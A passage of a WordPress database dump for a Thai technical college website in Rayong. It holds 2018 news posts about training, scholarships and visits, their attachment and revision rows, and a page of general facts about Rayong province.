(4019, 3, '2018-10-01 09:40:58', '2018-10-01 02:40:58', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D682519025457622%26id%3D100010985913485&width=500\" width=\"500\" height=\"780\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ 24 กันยายน 2561 สถาบันการอาชีวศึกษาภาคตะวันออก ร่วมกับ บริษัท ซีเอ็ดยูเคชั่น จำกัด (มหาชน) จัดอบรมให้ความรู้การประยุกต์ใช้งานเครื่องพิพม์ 3 มิติ เพื่อการออกแบบสร้างร่วมกับเทคโนโลยีหุ่นยนต์ให้กับครูผู้สอนแผนกวิชาช่างอิเล็กทรอนิกส์ ช่างกลโรงงาน ช่างไฟฟ้า ช่างยนต์ และคอมพิวเติร์ธุรกิจ โดยมี ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีเปิด ณ ห้องประชุมสัมมนาอาชีวศึกษา วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4017-revision-v1', '', '', '2018-10-01 09:40:58', '2018-10-01 02:40:58', '', 4017, 'http://www.technicrayong.ac.th/4017-revision-v1/', 0, 'revision', '', 0),
(4020, 3, '2018-10-01 10:42:47', '2018-10-01 03:42:47', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F201810011006.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ กำหนดเปิด - ปิดภาคเรียน ภาคเรียนที่ 2 ปีการศึกษา 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%81%e0%b8%b3%e0%b8%ab%e0%b8%99%e0%b8%94%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94-%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b8%a0%e0%b8%b2%e0%b8%84', '', '', '2018-10-01 10:42:47', '2018-10-01 03:42:47', '', 0, 'http://www.technicrayong.ac.th/?p=4020', 288, 'post', '', 0),
(4021, 3, '2018-10-01 10:42:23', '2018-10-01 03:42:23', '', '201810011006', '', 'inherit', 'closed', 'closed', '', '201810011006', '', '', '2018-10-01 10:42:23', '2018-10-01 03:42:23', '', 4020, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/201810011006.pdf', 0, 'attachment', 'application/pdf', 0),
(4022, 3, '2018-10-01 10:42:47', '2018-10-01 03:42:47', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F201810011006.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ กำหนดเปิด - ปิดภาคเรียน ภาคเรียนที่ 2 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '4020-revision-v1', '', '', '2018-10-01 10:42:47', '2018-10-01 03:42:47', '', 4020, 'http://www.technicrayong.ac.th/4020-revision-v1/', 0, 'revision', '', 0),
(4023, 3, '2018-10-02 09:51:41', '2018-10-02 02:51:41', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F1977290298957831&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 24 กันยายน 2561 ตัวแทนจากบริษัท บีแอลซีพี เพาเวอร์ จำกัด พบครูที่ปรึกษา และนักเรียน นักศึกษาที่ได้รับทุนการศึกษาบุตรหลานกลุ่มประมงเรือเล็ก เพื่อชี้แจงหลักเกณฑ์และข้อปฏิบัติของนักเรียนนักศึกษา โดยมีนักเรียน นักศึกษาวิทยาลัยเทคนิคระยองได้รับทุนการศึกษา จำนวน 10 ทุน ประกอบด้วย ระดับ ปวช.จำนวน 4 ทุน ทุนละ 20,000 บาทต่อปี และระดับ ปวส.จำนวน 6 ทุน ทุนละ 30,000 บาทต่อปี รวมเป็นเงินทั้งสิ้น 260,000 บาท', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-24%e2%80%8b-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99', '', '', '2018-10-02 09:51:41', '2018-10-02 02:51:41', '', 0, 'http://www.technicrayong.ac.th/?p=4023', 287, 'post', '', 0),
(4024, 3, '2018-10-02 09:50:26', '2018-10-02 02:50:26', '', '42478967_1977289398957921_5667713254110003200_n', '', 'inherit', 'closed', 'closed', '', '42478967_1977289398957921_5667713254110003200_n', '', '', '2018-10-02 09:50:26', '2018-10-02 02:50:26', '', 4023, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/42478967_1977289398957921_5667713254110003200_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(4025, 3, '2018-10-02 09:51:41', '2018-10-02 02:51:41', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F1977290298957831&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 24 กันยายน 2561 ตัวแทนจากบริษัท บีแอลซีพี เพาเวอร์ จำกัด พบครูที่ปรึกษา และนักเรียน นักศึกษาที่ได้รับทุนการศึกษาบุตรหลานกลุ่มประมงเรือเล็ก เพื่อชี้แจงหลักเกณฑ์และข้อปฏิบัติของนักเรียนนักศึกษา โดยมีนักเรียน นักศึกษาวิทยาลัยเทคนิคระยองได้รับทุนการศึกษา จำนวน 10 ทุน ประกอบด้วย ระดับ ปวช.จำนวน 4 ทุน ทุนละ 20,000 บาทต่อปี และระดับ ปวส.จำนวน 6 ทุน ทุนละ 30,000 บาทต่อปี รวมเป็นเงินทั้งสิ้น 260,000 บาท', '', 'inherit', 'closed', 'closed', '', '4023-revision-v1', '', '', '2018-10-02 09:51:41', '2018-10-02 02:51:41', '', 4023, 'http://www.technicrayong.ac.th/4023-revision-v1/', 0, 'revision', '', 0),
(4026, 3, '2018-10-02 09:57:28', '2018-10-02 02:57:28', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D682979625411562%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 25 กันยายน 2561 ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร ร่วมต้อนรับ คณะผู้บริหาร ครู บุคลากรทางการศึกษาจากวิทยาลัยอาชีวศึกษานครสวรรค์ เข้าศึกษาดูงาน ภายใต้โครงการพัฒนาบุคลากร จำนวนทั้งสิ้น 123 คน ณ ห้องประชุมสัมมนาอาชีวศึกษา วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-25-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99-2561-%e0%b8%a7%e0%b9%88', '', '', '2018-10-02 09:57:28', '2018-10-02 02:57:28', '', 0, 'http://www.technicrayong.ac.th/?p=4026', 286, 'post', '', 0),
(4027, 3, '2018-10-02 09:56:04', '2018-10-02 02:56:04', '', '42546550_682979115411613_5322076207641001984_o', '', 'inherit', 'closed', 'closed', '', '42546550_682979115411613_5322076207641001984_o', '', '', '2018-10-02 09:56:04', '2018-10-02 02:56:04', '', 4026, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/42546550_682979115411613_5322076207641001984_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4028, 3, '2018-10-02 09:57:28', '2018-10-02 02:57:28', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D682979625411562%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 25 กันยายน 2561 ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร ร่วมต้อนรับ คณะผู้บริหาร ครู บุคลากรทางการศึกษาจากวิทยาลัยอาชีวศึกษานครสวรรค์ เข้าศึกษาดูงาน ภายใต้โครงการพัฒนาบุคลากร จำนวนทั้งสิ้น 123 คน ณ ห้องประชุมสัมมนาอาชีวศึกษา วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4026-revision-v1', '', '', '2018-10-02 09:57:28', '2018-10-02 02:57:28', '', 4026, 'http://www.technicrayong.ac.th/4026-revision-v1/', 0, 'revision', '', 0),
(4029, 3, '2018-10-02 10:03:56', '2018-10-02 03:03:56', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D682985278744330%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 25 กันยายน 2561 วิทยาลัยเทคนิคระยอง ยินดีต้อนรับ คณะผู้บริหาร ครู จากวิทยาลัยเทคนิคน่าน เข้าศึกษาดูงานการเรียนการสอน และเยี่ยมชมศูนย์ Eec Tvet Rayong ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-25-%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%a2%e0%b8%b2%e0%b8%a2%e0%b8%99-2561-%e0%b8%a7%e0%b8%b4', '', '', '2018-10-02 10:03:56', '2018-10-02 03:03:56', '', 0, 'http://www.technicrayong.ac.th/?p=4029', 285, 'post', '', 0),
(4030, 3, '2018-10-02 10:03:42', '2018-10-02 03:03:42', '', '42603570_682984702077721_378418989946109952_o', '', 'inherit', 'closed', 'closed', '', '42603570_682984702077721_378418989946109952_o', '', '', '2018-10-02 10:03:42', '2018-10-02 03:03:42', '', 4029, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/42603570_682984702077721_378418989946109952_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4031, 3, '2018-10-02 10:03:56', '2018-10-02 03:03:56', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D682985278744330%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 25 กันยายน 2561 วิทยาลัยเทคนิคระยอง ยินดีต้อนรับ คณะผู้บริหาร ครู จากวิทยาลัยเทคนิคน่าน เข้าศึกษาดูงานการเรียนการสอน และเยี่ยมชมศูนย์ Eec Tvet Rayong ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4029-revision-v1', '', '', '2018-10-02 10:03:56', '2018-10-02 03:03:56', '', 4029, 'http://www.technicrayong.ac.th/4029-revision-v1/', 0, 'revision', '', 0),
(4033, 3, '2018-10-02 10:07:00', '2018-10-02 03:07:00', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.685527305156794%26type%3D3&width=500\" width=\"500\" height=\"802\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 1 ตุลาคม 2561 วิทยาลัยเทคนิคระยอง ร่วมกับกระทรวงการท่องเที่ยวและกีฬา บริษัท พีทีที โกลบอล เคมิคอล จำกัด (มหาชน) โครงการเชฟชุมชนเพื่อท่องเที่ยวไทยยั่งยืน เพื่อส่งเสริมภาพลักษณ์การท่องเที่ยวเชิงวัฒนธรรมอาหารให้กับประเทศไทย โดยยกระดับมาตราฐานอาหารไทยจากระดับชุมชน สร้างเครือข่ายด้านการท่องเที่ยวเชิงอาหารแปรรูปธรรมและกระตุ้นเศรษฐกิจในระดับชุมชนอย่างยั่งยืน ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-1-%e0%b8%95%e0%b8%b8%e0%b8%a5%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%a7%e0%b8%b4%e0%b8%97', '', '', '2018-10-03 10:04:52', '2018-10-03 03:04:52', '', 0, 'http://www.technicrayong.ac.th/?p=4033', 284, 'post', '', 0),
(4034, 3, '2018-10-02 10:06:42', '2018-10-02 03:06:42', '', '42826148_685532721822919_4711076582473596928_o', '', 'inherit', 'closed', 'closed', '', '42826148_685532721822919_4711076582473596928_o', '', '', '2018-10-02 10:06:42', '2018-10-02 03:06:42', '', 4033, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/42826148_685532721822919_4711076582473596928_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4035, 3, '2018-10-02 10:07:00', '2018-10-02 03:07:00', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.685527305156794%26type%3D3&width=500\" width=\"500\" height=\"802\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 1 ตุลาคม 2561 วิทยาลัยเทคนิคระยอง ร่วมกับกระทรวงการท่องเที่ยวและกีฬา บริษัท พีทีที โกลบอล เคมิคอล จำกัด (มหาชน) ดโครงการเชฟชุมชนเพื่อท่องเที่ยวไทยยั่งยืน ซึ่งเป็นโครงการความร่วมมือระหว่างภาครัฐ ภาคเอกชนและชุมชน เพื่อส่งเสริมภาพลักษณ์การท่องเที่ยวเชิงวัฒนธรรมอาหารให้กับประเทศไทย โดยยกระดับมาตราฐานอาหารไทยจากระดับชุมชน สร้างเครือข่ายด้านการท่องเที่ยวเชิงอาหารแปรรูปธรรมและกระตุ้นเศรษฐกิจในระดับชุมชนอย่างยั่งยืน ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4033-revision-v1', '', '', '2018-10-02 10:07:00', '2018-10-02 03:07:00', '', 4033, 'http://www.technicrayong.ac.th/4033-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4036, 3, '2018-10-02 10:46:57', '2018-10-02 03:46:57', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=category&layout=blog&id=62&Itemid=135\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>2558 <span lang=\"TH\">มีทั้งสิ้น</span> 688,999<span lang=\"TH\"> คน เป็นชาย 339</span>,333<span lang=\"TH\"> คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 349,666 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 271,460 <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,816<span lang=\"TH\"> คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 527.60 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>292.10 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 65.8 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 698,017 <span lang=\"TH\">คนในปี</span> 2561 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4><b><a href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/images/stories/rayongdata60.pdf\">บรรยายสรุปจังหวัดระยอง 2560</a></h4>\r\n</div>\r\n<h4><a href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></h4>\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a>\r\n\r\n \r\n\r\n<b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b>\r\n\r\n<span style=\"color: #0000ff; font-size: medium;\"><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span>\r\n\r\n<b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b>\r\n\r\n<strong><a 